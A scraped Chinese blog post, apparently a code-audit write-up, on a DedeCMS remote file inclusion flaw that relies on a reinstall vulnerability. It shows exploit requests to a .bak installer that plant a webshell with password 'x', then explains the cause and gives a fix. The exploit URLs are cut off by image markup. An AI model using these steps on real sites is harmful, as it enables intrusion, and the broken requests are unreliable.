天天看點
傳回

dedecms遠端檔案包含漏洞

利用前提存在重裝漏洞

dedecms遠端檔案包含漏洞

在自己網站準備一個遠端檔案

dedecms遠端檔案包含漏洞

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_在這裡插入圖檔描述" src="https://img-blog.csdnimg.cn/4520a04449a74a2d9acc97a8213f1448.png" />

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_在這裡插入圖檔描述" src="https://img-blog.csdnimg.cn/7de974c77cc9484a9fa81afdfdc0b1c5.png" />

生成http://www.d.com/install/1720.php 密碼 x,webshell連接配接

存在漏洞的代碼

dedecms遠端檔案包含漏洞

url參數,存在可以控制的參數,變量被覆寫,如下

insLockfile=a&s_在這裡插入圖檔描述" src="https://img-blog.csdnimg.cn/2a099bd77e464fb0b5dd05ea247d3dc1.png" />

代碼包含了config_update.php

dedecms遠端檔案包含漏洞

修複:

把紅框的代碼放在前面

dedecms遠端檔案包含漏洞

更改位置後

dedecms遠端檔案包含漏洞
web安全 滲透測試 代碼審計 php 安全
上一篇: 【BUGKUCTF】代碼審計wp
下一篇: 【報錯解決】OSError: cxx/lib/solve_csa.so: cannot open shared object file: No such file or directory

繼續閱讀